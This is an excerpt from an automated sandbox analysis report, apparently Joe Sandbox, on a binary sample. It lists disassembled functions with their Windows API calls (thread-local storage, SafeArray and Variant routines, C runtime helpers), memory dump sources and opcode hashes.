                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,6CF3A2D4,6CF695C0,00000008,6CF3A468,?,?,?,6CF695E0,0000000C,6CF3A523,?), ref: 6CF3ECA5
                                                                                                                                                                                                                                              • __mtterm.LIBCMT ref: 6CF3ECB1
                                                                                                                                                                                                                                                • Part of subcall function 6CF3E97C: DecodePointer.KERNEL32(00000012,6CF3A397,6CF3A37D,6CF695C0,00000008,6CF3A468,?,?,?,6CF695E0,0000000C,6CF3A523,?), ref: 6CF3E98D
                                                                                                                                                                                                                                                • Part of subcall function 6CF3E97C: TlsFree.KERNEL32(0000000C,6CF3A397,6CF3A37D,6CF695C0,00000008,6CF3A468,?,?,?,6CF695E0,0000000C,6CF3A523,?), ref: 6CF3E9A7
                                                                                                                                                                                                                                                • Part of subcall function 6CF3E97C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,6CF3A397,6CF3A37D,6CF695C0,00000008,6CF3A468,?,?,?,6CF695E0,0000000C,6CF3A523,?), ref: 6CF42325
                                                                                                                                                                                                                                                • Part of subcall function 6CF3E97C: DeleteCriticalSection.KERNEL32(0000000C,?,?,6CF3A397,6CF3A37D,6CF695C0,00000008,6CF3A468,?,?,?,6CF695E0,0000000C,6CF3A523,?), ref: 6CF4234F
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 6CF3ECC7
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 6CF3ECD4
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 6CF3ECE1
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 6CF3ECEE
                                                                                                                                                                                                                                              • TlsAlloc.KERNEL32(?,?,6CF3A2D4,6CF695C0,00000008,6CF3A468,?,?,?,6CF695E0,0000000C,6CF3A523,?), ref: 6CF3ED3E
                                                                                                                                                                                                                                              • TlsSetValue.KERNEL32(00000000,?,?,6CF3A2D4,6CF695C0,00000008,6CF3A468,?,?,?,6CF695E0,0000000C,6CF3A523,?), ref: 6CF3ED59
                                                                                                                                                                                                                                              • __init_pointers.LIBCMT ref: 6CF3ED63
                                                                                                                                                                                                                                              • EncodePointer.KERNEL32(?,?,6CF3A2D4,6CF695C0,00000008,6CF3A468,?,?,?,6CF695E0,0000000C,6CF3A523,?), ref: 6CF3ED74
                                                                                                                                                                                                                                              • EncodePointer.KERNEL32(?,?,6CF3A2D4,6CF695C0,00000008,6CF3A468,?,?,?,6CF695E0,0000000C,6CF3A523,?), ref: 6CF3ED81
                                                                                                                                                                                                                                              • EncodePointer.KERNEL32(?,?,6CF3A2D4,6CF695C0,00000008,6CF3A468,?,?,?,6CF695E0,0000000C,6CF3A523,?), ref: 6CF3ED8E
                                                                                                                                                                                                                                              • EncodePointer.KERNEL32(?,?,6CF3A2D4,6CF695C0,00000008,6CF3A468,?,?,?,6CF695E0,0000000C,6CF3A523,?), ref: 6CF3ED9B
                                                                                                                                                                                                                                              • DecodePointer.KERNEL32(Function_0006EB00,?,?,6CF3A2D4,6CF695C0,00000008,6CF3A468,?,?,?,6CF695E0,0000000C,6CF3A523,?), ref: 6CF3EDBC
                                                                                                                                                                                                                                              • __calloc_crt.LIBCMT ref: 6CF3EDD1
                                                                                                                                                                                                                                              • DecodePointer.KERNEL32(00000000,?,?,6CF3A2D4,6CF695C0,00000008,6CF3A468,?,?,?,6CF695E0,0000000C,6CF3A523,?), ref: 6CF3EDEB
                                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6CF3EDFD
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                                                                                                                                                                                                                                              • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                                                                                                              • API String ID: 1868149495-3819984048
                                                                                                                                                                                                                                              • Opcode ID: f1562d7b4137fa3e6dcb8f586c68c9a7d6b540b343655959e8d161b35dcb7eae
                                                                                                                                                                                                                                              • Instruction ID: 622bd189bb401cddf976a23b56cc01c37a9399e0b83d83d5c82c3920603ead50
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f1562d7b4137fa3e6dcb8f586c68c9a7d6b540b343655959e8d161b35dcb7eae
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5931B231E20334ABEFC2BF75B80475A3FB5BB16614735152AE42892A90DB308851CFF0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEE0EA0 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 337COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _memmove$Xinvalid_argumentstd::_
                                                                                                                                                                                                                                              • String ID: invalid string position$string too long
                                                                                                                                                                                                                                              • API String ID: 1771113911-4289949731
                                                                                                                                                                                                                                              • Opcode ID: 7495dcc18b913d21e4b226bbbe2543f8e83c7612f46da4739de918f326476206
                                                                                                                                                                                                                                              • Instruction ID: 9ac9072bb58ef9005a69163d881b64f774981600a65e7fb883de5c040aa44bae
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7495dcc18b913d21e4b226bbbe2543f8e83c7612f46da4739de918f326476206
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1BB18271300144ABDB18CF5CDC91A9E73B6EB89794724491CF496CBB42CB34EC95C7A2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF47FC4 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 138COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • UnDecorator::getBasicDataType.LIBCMT ref: 6CF47FFF
                                                                                                                                                                                                                                              • DName::operator=.LIBCMT ref: 6CF48013
                                                                                                                                                                                                                                              • DName::operator+=.LIBCMT ref: 6CF48021
                                                                                                                                                                                                                                              • UnDecorator::getPtrRefType.LIBCMT ref: 6CF4804D
                                                                                                                                                                                                                                              • UnDecorator::getDataIndirectType.LIBCMT ref: 6CF480CA
                                                                                                                                                                                                                                              • UnDecorator::getBasicDataType.LIBCMT ref: 6CF480D3
                                                                                                                                                                                                                                              • operator+.LIBCMT ref: 6CF48166
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Decorator::getType$Data$Basic$IndirectName::operator+=Name::operator=operator+
                                                                                                                                                                                                                                              • String ID: std::nullptr_t$volatile
                                                                                                                                                                                                                                              • API String ID: 2203807771-3726895890
                                                                                                                                                                                                                                              • Opcode ID: f5678becd9663e7f2cb21cccbfef3bda3b739f83d94787577d9b2858a406b6c5
                                                                                                                                                                                                                                              • Instruction ID: 0fed525ada8f07cbd6f6fa5e01df0d70a76ced75854c09f3128f6a885f815a06
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f5678becd9663e7f2cb21cccbfef3bda3b739f83d94787577d9b2858a406b6c5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D741AE72914108FFDB119F58D880AEE7F74FB02346F51C067E954A6A13D7319A45CBE0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF5140 Relevance: 21.2, APIs: 14, Instructions: 203COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 6CEF5177
                                                                                                                                                                                                                                                • Part of subcall function 6CF02820: _malloc.LIBCMT ref: 6CF02871
                                                                                                                                                                                                                                              • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000004), ref: 6CEF51B9
                                                                                                                                                                                                                                              • SafeArrayCreateVector.OLEAUT32(00000011,00000000,00000000), ref: 6CEF51D5
                                                                                                                                                                                                                                              • SafeArrayAccessData.OLEAUT32(00000000,00000000), ref: 6CEF51E5
                                                                                                                                                                                                                                              • _memmove.LIBCMT ref: 6CEF51FF
                                                                                                                                                                                                                                              • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6CEF5208
                                                                                                                                                                                                                                              • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CEF522C
                                                                                                                                                                                                                                              • SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6CEF5263
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF526C
                                                                                                                                                                                                                                              • SafeArrayPutElement.OLEAUT32(00000000,00000002,?), ref: 6CEF52AD
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF52B6
                                                                                                                                                                                                                                              • SafeArrayPutElement.OLEAUT32(00000000,00000002,00000002), ref: 6CEF52D2
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEF534E
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF5358
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArraySafe$ElementVariant$Clear$CreateDataVector$AccessDestroyInitUnaccess_malloc_memmove
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 452649785-0
                                                                                                                                                                                                                                              • Opcode ID: fabedc5cb536808bf949c0fa31b09a0a3abe2f846ffcdcb1f6a7ba7755459443
                                                                                                                                                                                                                                              • Instruction ID: b5426b5e025d46e8f386fb892a8d34ffe47dead5e8eb518fe34d65e0a851b59b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fabedc5cb536808bf949c0fa31b09a0a3abe2f846ffcdcb1f6a7ba7755459443
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 95713AB1A1121AEBDB01CFA9C884BAFBBB8FF59704F108119E915D7640D774E916CBA0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF49B0 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 174COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(6CF505A8), ref: 6CEF49EE
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 6CEF49F7
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 6CEF49FD
                                                                                                                                                                                                                                              • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CEF4A08
                                                                                                                                                                                                                                              • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEF4A39
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF4A45
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEF4B66
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF4B76
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF4B7C
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(6CF505A8), ref: 6CEF4B82
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
                                                                                                                                                                                                                                              • String ID: 1l$1l
                                                                                                                                                                                                                                              • API String ID: 2515392200-1092580327
                                                                                                                                                                                                                                              • Opcode ID: 2d2ac65b3473a366eea4c2fd98f5b9162a5bc4f032d8200641df3d01e2f3ea7b
                                                                                                                                                                                                                                              • Instruction ID: e6238bc562d7455e6e14c34f6c368922ba5c0ecae5be44fd287bc6c655784093
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2d2ac65b3473a366eea4c2fd98f5b9162a5bc4f032d8200641df3d01e2f3ea7b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B5517F72A00219AFCB04DFA4CD84EAEBBB8FF89314F144169E915EB745D734E905CBA0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF4BA0 Relevance: 19.7, APIs: 10, Strings: 1, Instructions: 475COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 6CEF4BDC
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 6CEF4BE5
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 6CEF4BEB
                                                                                                                                                                                                                                              • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CEF4BF6
                                                                                                                                                                                                                                              • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CEF4C2A
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF4C37
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CEF5107
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF5117
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF511D
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEF5123
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
                                                                                                                                                                                                                                              • String ID: 2l
                                                                                                                                                                                                                                              • API String ID: 2515392200-408751688
                                                                                                                                                                                                                                              • Opcode ID: 6ccaea6576a9bca112ee999bfb89b51015ae14ecce1579d4dbba9fb57bc9475c
                                                                                                                                                                                                                                              • Instruction ID: e465a05061ab31ecae98b1bb7a2409fa50243a7ea7365e4de469901f3c55bc2e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6ccaea6576a9bca112ee999bfb89b51015ae14ecce1579d4dbba9fb57bc9475c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0712F675A15705AFC758DBA8DD84DAAB7B9BF8C300F14466CF50AABB91CA30F841CB50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEEF95E Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 332COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEEFA0F
                                                                                                                                                                                                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEEFA22
                                                                                                                                                                                                                                              • SafeArrayGetElement.OLEAUT32 ref: 6CEEFA5A
                                                                                                                                                                                                                                                • Part of subcall function 6CEF3A90: SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEF3B71
                                                                                                                                                                                                                                                • Part of subcall function 6CEF3A90: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEF3B83
                                                                                                                                                                                                                                                • Part of subcall function 6CEF69C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CEF6A08
                                                                                                                                                                                                                                                • Part of subcall function 6CEF69C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEF6A15
                                                                                                                                                                                                                                                • Part of subcall function 6CEF69C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CEF6A41
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23B3
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23C3
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23D6
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23E9
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23FC
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF240F
                                                                                                                                                                                                                                                • Part of subcall function 6CEEDFB0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6CEEDFF6
                                                                                                                                                                                                                                                • Part of subcall function 6CEEDFB0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEEE003
                                                                                                                                                                                                                                                • Part of subcall function 6CEEDFB0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CEEE02F
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArraySafe$Bound$Destroy$Element
                                                                                                                                                                                                                                              • String ID: RS7m$RS{m
                                                                                                                                                                                                                                              • API String ID: 959723449-144615663
                                                                                                                                                                                                                                              • Opcode ID: 99e86f8523e905b1971bfea4f0b3f6adf2d993e055a8f50353e7232219aa016f
                                                                                                                                                                                                                                              • Instruction ID: 0d3bb7cf88354cc25cf7174a4ac1bcb5e68ece97c881774bf34c3b00f9d8cedd
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 99e86f8523e905b1971bfea4f0b3f6adf2d993e055a8f50353e7232219aa016f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4FC17EB0A012059FDB14DF68CC84FADB7B9AF88308F304198E959AB786DB75E945CF50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF3690 Relevance: 18.2, APIs: 12, Instructions: 215COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
